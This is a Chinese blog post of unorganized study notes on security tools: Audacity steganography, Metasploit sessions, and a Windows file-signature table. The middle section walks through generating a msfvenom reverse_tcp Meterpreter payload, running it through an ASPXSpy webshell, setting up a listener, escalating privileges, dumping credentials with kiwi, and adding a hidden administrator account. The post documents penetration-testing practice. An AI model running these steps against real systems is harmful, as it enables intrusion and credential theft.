

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/bg/user.png?q-sign-algorithm=sha1&amp;q-ak=AKIDpegVDZ8AvdeOl9y_QSyKyK12a20XFhyhuJhBwLSuvHKsekbKEMUta0rN08zvHAq-&amp;q-sign-time=1718111967;1718115567&amp;q-key-time=1718111967;1718115567&amp;q-header-list=host&amp;q-url-param-list=ci-process&amp;q-signature=ca65ad0048078ce47a981f916f01c8647a2c19f8&amp;x-cos-security-token=COGKjqm1WneMq7j3Ly0fjeAhJ9WUkQUae48a32f30adec122c1e45bfb27d90f77q621KK_kJiZmuCniurmq9gxXuyet9caxp3hErKJXOpDvGpjXE_N920YezRSvaRvqmjxbv0giIhObLK5-FZ6Vm23lwoBvKnFPYFRlDEvzuLFDMtpgDzewuBa2dOpXm8_EO9f3Al7BSoZEWhVaAJJfBrpOQxl0dNfWn4gbZ_PgFiQa4QfzEWKEIU3fOkGK9Jui&amp;ci-process=originImage">
  <link rel="icon" href="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/bg/user.png?q-sign-algorithm=sha1&amp;q-ak=AKIDpegVDZ8AvdeOl9y_QSyKyK12a20XFhyhuJhBwLSuvHKsekbKEMUta0rN08zvHAq-&amp;q-sign-time=1718111967;1718115567&amp;q-key-time=1718111967;1718115567&amp;q-header-list=host&amp;q-url-param-list=ci-process&amp;q-signature=ca65ad0048078ce47a981f916f01c8647a2c19f8&amp;x-cos-security-token=COGKjqm1WneMq7j3Ly0fjeAhJ9WUkQUae48a32f30adec122c1e45bfb27d90f77q621KK_kJiZmuCniurmq9gxXuyet9caxp3hErKJXOpDvGpjXE_N920YezRSvaRvqmjxbv0giIhObLK5-FZ6Vm23lwoBvKnFPYFRlDEvzuLFDMtpgDzewuBa2dOpXm8_EO9f3Al7BSoZEWhVaAJJfBrpOQxl0dNfWn4gbZ_PgFiQa4QfzEWKEIU3fOkGK9Jui&amp;ci-process=originImage">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Re1ca1g">
  <meta name="keywords" content="">
  
    <meta name="description" content="Audacity音频处理软件，常用于查看音频隐写，类似摩斯密码等 首先打开文件，然后观察是否有多个音轨，然后观察音轨中是否有摩斯密码等相关的信息（长短）  然后对照这翻译  msf的使用12345678910111213141516171819Kali中MSF中session相关命令：sessions    –h 查看帮助sessions 	-i &lt;ID值&gt;  #进入会话   			-">
<meta property="og:type" content="article">
<meta property="og:title" content="相关工具使用（未整理版）">
<meta property="og:url" content="http://example.com/2023/07/05/tool/1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Audacity音频处理软件，常用于查看音频隐写，类似摩斯密码等 首先打开文件，然后观察是否有多个音轨，然后观察音轨中是否有摩斯密码等相关的信息（长短）  然后对照这翻译  msf的使用12345678910111213141516171819Kali中MSF中session相关命令：sessions    –h 查看帮助sessions 	-i &lt;ID值&gt;  #进入会话   			-">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307241441432.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307241445142.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261114178.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261512384.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261512838.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261509599.png">
<meta property="og:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261530835.png">
<meta property="article:published_time" content="2023-07-05T11:57:00.000Z">
<meta property="article:modified_time" content="2023-12-26T06:54:50.745Z">
<meta property="article:author" content="Re1ca1g">
<meta property="article:tag" content="相关工具使用">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307241441432.png">
  
  
  
  <title>相关工具使用（未整理版） - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 7.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 80vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>re1ca1g·blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('http://www.98qy.com/sjbz/api.php') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.6)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="相关工具使用（未整理版）"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-05 19:57" pubdate>
          2023年7月5日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          917 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          8 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">相关工具使用（未整理版）</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Audacity"><a href="#Audacity" class="headerlink" title="Audacity"></a>Audacity</h1><p>音频处理软件，常用于查看音频隐写，类似摩斯密码等</p>
<p>首先打开文件，然后观察是否有多个音轨，然后观察音轨中是否有摩斯密码等相关的信息（长短）</p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307241441432.png" srcset="/img/loading.gif" lazyload alt="image-20230724144117152"></p>
<p>然后对照这翻译</p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307241445142.png" srcset="/img/loading.gif" lazyload alt="image-20230724144501063"></p>
<h1 id="msf的使用"><a href="#msf的使用" class="headerlink" title="msf的使用"></a>msf的使用</h1><figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs hsp">Kali中MSF中session相关命令：<br><br>sessions    –h 查看帮助<br>sessions 	-i &lt;ID值&gt;  <span class="hljs-meta">#进入会话  </span><br><br> 			-k  杀死会话	<br>background  <span class="hljs-meta">#将当前会话放置后台</span><br><span class="hljs-keyword">run</span>  		<span class="hljs-meta">#执行已有的模块，输入run后按两下tab，列出已有的脚本</span><br>info	    <span class="hljs-meta">#查看已有模块信息</span><br>getuid 		<span class="hljs-meta">#查看权限 </span><br>getpid 		<span class="hljs-meta">#获取当前进程的pid</span><br><span class="hljs-keyword">sysinfo</span> 	<span class="hljs-meta">#查看目标机系统信息</span><br>ps 			<span class="hljs-meta">#查看当前活跃进程   </span><br><br>kill 		<span class="hljs-meta">#&lt;PID值&gt; 杀死进程</span><br>idletime 	<span class="hljs-meta">#查看目标机闲置时间</span><br>reboot		<span class="hljs-meta">#重启</span><br>shutdown   	<span class="hljs-meta">#关机</span><br>shell 		<span class="hljs-meta">#进入目标机<span class="hljs-keyword">CMD</span>窗口</span><br></code></pre></td></tr></table></figure>

<h2 id="反弹加提权的一般步骤"><a href="#反弹加提权的一般步骤" class="headerlink" title="反弹加提权的一般步骤"></a>反弹加提权的一般步骤</h2><p>首先先用msfvenom生成攻击载荷</p>
<p><code>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=12345 -f exe &gt;s.exe</code></p>
<p>上传载荷致服务器端，要选一个可以执行的目录文件，用wt.asp先扫一遍目录先看看</p>
<p>然后拿ASPXSpy2014.aspx（admin）执行文件</p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261114178.png" srcset="/img/loading.gif" lazyload alt="image-20230726111408035"></p>
<p>在此之前先开启监听</p>
<p><code>msfconsole</code></p>
<p><code>use exploit/multi/handler</code></p>
<p><code>set payload windows/meterpreter/reverse_tcp</code></p>
<p><code>set lhost 192.168.x.x</code></p>
<p><code>set lport xx ()随便空端口号就行)</code></p>
<p><code>run</code></p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261512384.png" srcset="/img/loading.gif" lazyload alt="image-20230724145454737"></p>
<p>等待上线</p>
<p>上线以后检测提权的漏洞 </p>
<p><code>use post/multi/recon/local_exploit_suggester</code></p>
<p><code>set session 1</code></p>
<p><code>run</code></p>
<p>有可能会提示检测中途断开，更新一下msf</p>
<p>看一下能用的漏洞模块</p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261512838.png" srcset="/img/loading.gif" lazyload alt="image-20230725220840944"></p>
<p>利用一下，提权完毕</p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261509599.png" srcset="/img/loading.gif" lazyload alt="image-20230725221029006"></p>
<h2 id="后渗透"><a href="#后渗透" class="headerlink" title="后渗透"></a>后渗透</h2><p>后渗透就感觉很刑了</p>
<p>多个方法玩转主机</p>
<p>help查看能用的功能 但是呢这种英文版肯定是不适合我这种废物的</p>
<p>所以呢肯定得搞一个中文版看看<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45605352/article/details/115824811">(Meterpreter命令详解）</a></p>
<p><img src="https://blog-1318287398.cos.ap-nanjing.myqcloud.com/img/202307261530835.png" srcset="/img/loading.gif" lazyload alt="image-20230726153009757"></p>
<p>要是进了shell发现奇奇怪怪的玄学问题那也只好全部关掉重新抓个进去用了</p>
<p>meterpreter 是可以加载很多模块进行利用的</p>
<h3 id="模块利用"><a href="#模块利用" class="headerlink" title="模块利用"></a>模块利用</h3><p>我是先学了<strong>kiwi</strong>模块</p>
<p>这个首先得load kiwi加载模块</p>
<p>其次得关注一下系统的架构 64x的要把进程迁到64x进程中 kiwi默认实现32x的</p>
<p>sysinfo看系统信息</p>
<p>ps看进程 </p>
<p>migrate [PID]换进程</p>
<p>具体可以参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45588247/article/details/119497964">MSF中kiwi(mimikatz)模块的使用</a></p>
<p>这个是shell中主机操作 <a target="_blank" rel="noopener" href="https://chenchena.blog.csdn.net/article/details/124493550">后渗透主机操作_渗透后控制主机_</a>用来关关防火墙，远控桌面</p>
<h3 id="cmd命令"><a href="#cmd命令" class="headerlink" title="cmd命令"></a>cmd命令</h3><p>补一条拿了管理员权限增加用户命令</p>
<p>net user [name] [paaswd] &#x2F;add #增加用户</p>
<p>net localgroup #查看计算机本地组用户，看一下什么是有管理员权限的</p>
<p>net user [name]# 用于查看用户的相关信息，可以看用户组的改变</p>
<p>net localgroup Adminstrators(组) [name] &#x2F;add</p>
<h2 id="文件格式"><a href="#文件格式" class="headerlink" title="文件格式"></a>文件格式</h2><h3 id="文件头和文件尾"><a href="#文件头和文件尾" class="headerlink" title="文件头和文件尾"></a>文件头和文件尾</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs java">JPEG (jpg)，             　文件头：FFD8FF　　　　　　　　　　　　　　　　　　　　　　　 文件尾：FF D9　　　　　　　　　　　　　　　<br><span class="hljs-title function_">PNG</span> <span class="hljs-params">(png)</span>，            　　 文件头：<span class="hljs-number">89504E47</span>　　　　　　　　　　　　　　　　　　　　　　文件尾：AE <span class="hljs-number">42</span> <span class="hljs-number">60</span> <span class="hljs-number">82</span><br>GIF (gif)，              　　文件头：<span class="hljs-number">47494638</span>　　　　　　　　　　　　　　　　　　　　　　文件尾：<span class="hljs-number">00</span> 3B                                 ZIP <span class="hljs-title function_">Archive</span> <span class="hljs-params">(zip)</span>，           文件头：504B0304　　　　　　　　　　　　　　　　　　　　　　文件尾：<span class="hljs-number">50</span> 4B<br><br><span class="hljs-title function_">TIFF</span> <span class="hljs-params">(tif)</span>，              　  文件头：49492A00　　　　　　　　　　　　　　　　　　　　　　文件尾：<br>Windows <span class="hljs-title function_">Bitmap</span> <span class="hljs-params">(bmp)</span>，      文件头：<span class="hljs-number">424D</span>　　　　　　　　　　　　　　　　　　　　　　　　 文件尾：<br>CAD (dwg)，               文件头：<span class="hljs-number">41433130</span>　　　　　　　　　　　　　　　　　　　　　　文件尾：<br>Adobe <span class="hljs-title function_">Photoshop</span> <span class="hljs-params">(psd)</span>，      文件头：<span class="hljs-number">38425053</span>　　　　　　　　　　　　　　　　　　　　　　文件尾：<br>Rich Text <span class="hljs-title function_">Format</span> <span class="hljs-params">(rtf)</span>，       文件头：7B5C727466　　　　　　　　　　　　　　　　　　　　  文件尾：<br>XML (xml)，                文件头：3C3F786D6C　　　　　　　　　　　　　　　　　　　　 文件尾：<br>HTML (html)，              文件头：68746D6C3E<br>Email [thorough only] (eml)，   文件头：44656C69766572792D646174653A<br>Outlook <span class="hljs-title function_">Express</span> <span class="hljs-params">(dbx)</span>，       文件头：CFAD12FEC5FD746F<br><span class="hljs-title function_">Outlook</span> <span class="hljs-params">(pst)</span>，             文件头：2142444E<br>MS Word/Excel (xls.or.doc)，    文件头：D0CF11E0<br>MS <span class="hljs-title function_">Access</span> <span class="hljs-params">(mdb)</span>，           文件头：5374616E64617264204A<br><span class="hljs-title function_">WordPerfect</span> <span class="hljs-params">(wpd)</span>，          文件头：FF575043<br>Adobe <span class="hljs-title function_">Acrobat</span> <span class="hljs-params">(pdf)</span>，        文件头：255044462D312E<br><span class="hljs-title function_">Quicken</span> <span class="hljs-params">(qdf)</span>，             文件头：AC9EBD8F<br>Windows <span class="hljs-title function_">Password</span> <span class="hljs-params">(pwl)</span>，     文件头：E3828596<br><br>RAR <span class="hljs-title function_">Archive</span> <span class="hljs-params">(rar)</span>，           文件头：<span class="hljs-number">52617221</span><br>Wave (wav)，               文件头：<span class="hljs-number">57415645</span><br>AVI (avi)，                 文件头：<span class="hljs-number">41564920</span><br>Real <span class="hljs-title function_">Audio</span> <span class="hljs-params">(ram)</span>，           文件头：2E7261FD<br>Real <span class="hljs-title function_">Media</span> <span class="hljs-params">(rm)</span>，            文件头：2E524D46<br><span class="hljs-title function_">MPEG</span> <span class="hljs-params">(mpg)</span>，              文件头：000001BA<br><span class="hljs-title function_">MPEG</span> <span class="hljs-params">(mpg)</span>，              文件头：000001B3<br><span class="hljs-title function_">Quicktime</span> <span class="hljs-params">(mov)</span>，           文件头：6D6F6F76<br>Windows <span class="hljs-title function_">Media</span> <span class="hljs-params">(asf)</span>，        文件头：3026B2758E66CF11<br><span class="hljs-title function_">MIDI</span> <span class="hljs-params">(mid)</span>，                文件头：4D546864<br></code></pre></td></tr></table></figure>

<p>EXE文件的反编译和分析</p>
<p>首先把exe放入detect it easy 查看其打包工具</p>
<p><code>E:\暗月\tool\ctf工具箱\ctf工具箱\逆向工程winlinux\die_win64_portable_3.08_x64</code></p>
<p>然后根据列出来的打包工具进行解包</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Tool/" class="category-chain-item">Tool</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E7%9B%B8%E5%85%B3%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/" class="print-no-link">#相关工具使用</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>相关工具使用（未整理版）</div>
      <div>http://example.com/2023/07/05/tool/1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Re1ca1g</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/07/10/misc/1/" title="misc刷题（杂七杂八）">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">misc刷题（杂七杂八）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/01/penetration/4/" title="暗月项目四（完整渗透测试）">
                        <span class="hidden-mobile">暗月项目四（完整渗透测试）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>re1ca1g</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span></span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
